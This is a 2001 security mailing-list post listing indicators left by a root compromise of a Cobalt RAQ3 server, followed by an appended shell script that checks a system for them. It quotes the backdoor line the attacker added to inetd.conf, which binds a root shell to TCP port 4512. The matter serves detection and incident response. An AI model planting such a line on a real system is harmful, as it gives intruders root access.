[cobalt-security] February Hack update
- Subject: [cobalt-security] February Hack update
- From: Stoopidcoopid@xxxxxxxxx
- Date: Sun, 4 Mar 2001 20:01:22 -0000
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
We have finished checking our RAQ3 following a serious root hack in February
using the Bind exploit. This is what we have found so far by comparing the
hacked machine with a good machine:
1) A file called "erkms.tgz" (probably a Trojan rootkit) was found in "/tmp"
directory. The file had not been executed. A directory called "erkms" was
also created although it was empty.
Advice: run a check for the "erkms.tgz" file and directories.
Also check for
/dev/hdcc
/dev/hdbb
/dev/ptyq
as the presence of these may indicate that the script was at least partly
executed.
2) A file called "init" was put into the "/usr/sbin" directory and a process
called "init" was activated every 5 minutes by executing the file from
crontab. Two "init" processes were therefore running at the same time; the
purpose of the new process is unknown.
Advice: Check for the "init" file, check your crontab entries and check what
processes are running. Look for an "init" process other than that found at
PID 1 using "ps -ax".
3) Changes were made to "/etc/rc.d/rc.sysinit" to add the text
"/usr/sbin/cronlogd" at the end which launches a process
called "cronlogd", purpose unknown.
Advice: Check that the "/etc/rc.d/rc.sysinit" file has not been tampered with,
and check what processes are running using "ps -ax".
4) Changes were made to the file "inetd.conf" and also to the file
"inetd.conf.noqpopper", both found in the "/etc" directory. A new line
reading "4512 stream tcp nowait root /bin/sh sh -i" was added to both files
which opens port 4512.
Advice: check what ports you have open using
netstat -ap | grep "*:*"
Check both of the above files have not been tampered with.
5) We have a suspect small text file called "la.pid" in both the root dir and
the "/usr/sbin" dir. Web security pages suggest this could be an indicator of
whether malicious code has been properly installed or not. It is not found
on a good machine.
Advice: Try a "locate la.pid" from the command line. Any advice or updates
on this file or the other malicious files or processes are welcome.
SC
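The five "Advice" items above amount to a checklist of indicators. The script below is an added example that is not part of the original post: it turns that checklist into a single POSIX sh function that reports each indicator it finds. The paths, the port-4512 inetd line, the cronlogd reference and the "la.pid" file names are taken from the post; the crontab locations (/etc/crontab, /var/spool/cron/*, /etc/cron.d/*) and the CHECK_ROOT prefix, which lets the same checks run against a mounted copy of a suspect disk instead of the live system, are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): check a filesystem for the
# indicators described in the February RAQ3 incident report.
#
# Usage: sh check_raq3.sh            (checks the live filesystem)
#        CHECK_ROOT=/mnt/suspect sh check_raq3.sh   (checks a mounted image)

# check_indicators [ROOT]
# Prints one "FOUND ..." line per indicator. Returns 0 if anything was found
# (i.e. the host looks compromised), 1 if none of the indicators are present.
check_indicators() {
    root="${1:-}"
    found=0

    # Items 1, 2, 3 and 5: files, directories and device nodes named in the post.
    for p in /tmp/erkms.tgz /tmp/erkms /dev/hdcc /dev/hdbb /dev/ptyq \
             /usr/sbin/init /usr/sbin/cronlogd /root/la.pid /usr/sbin/la.pid; do
        if [ -e "$root$p" ]; then
            echo "FOUND path: $p"
            found=1
        fi
    done

    # Item 3: rc.sysinit modified to launch "cronlogd" at boot.
    f="$root/etc/rc.d/rc.sysinit"
    if [ -f "$f" ] && grep -q 'cronlogd' "$f" 2>/dev/null; then
        echo "FOUND cronlogd reference in /etc/rc.d/rc.sysinit"
        found=1
    fi

    # Item 4: inetd service line binding a root shell to TCP port 4512.
    for f in "$root/etc/inetd.conf" "$root/etc/inetd.conf.noqpopper"; do
        if [ -f "$f" ] && grep -Eq '^[[:space:]]*4512[[:space:]]+stream' "$f" 2>/dev/null; then
            echo "FOUND port-4512 service line in ${f#$root}"
            found=1
        fi
    done

    # Item 2: crontab entries that execute something called "init".
    # Crontab locations are an assumption of this example; "init" must be a
    # whole path component so /etc/init.d/... does not match.
    for f in "$root/etc/crontab" "$root"/var/spool/cron/* "$root"/etc/cron.d/*; do
        [ -f "$f" ] || continue
        if grep -Eq '(^|[[:space:]/])init([[:space:]]|$)' "$f" 2>/dev/null; then
            echo "FOUND init entry in ${f#$root}"
            found=1
        fi
    done

    [ "$found" -eq 1 ]
}

# check_extra_init: live-system only. Lists any running process named "init"
# whose PID is not 1 (the post's "ps -ax" advice). Returns 0 if one is found.
check_extra_init() {
    command -v ps >/dev/null 2>&1 || return 1
    ps -eo pid=,comm= 2>/dev/null | awk '$1 != 1 && $2 == "init" { print "FOUND extra init process, PID " $1; hit=1 } END { exit hit ? 0 : 1 }'
}

# Run the filesystem checks (and, on a live system, the process check).
check_indicators "${CHECK_ROOT:-}" || echo "no filesystem indicators found"
if [ -z "${CHECK_ROOT:-}" ]; then
    check_extra_init || echo "no extra init process found"
fi
```

Run it as root so /var/spool/cron and /dev are readable; on a mounted image set CHECK_ROOT to the mount point and the process check is skipped, since the running processes belong to the analysis host, not the image.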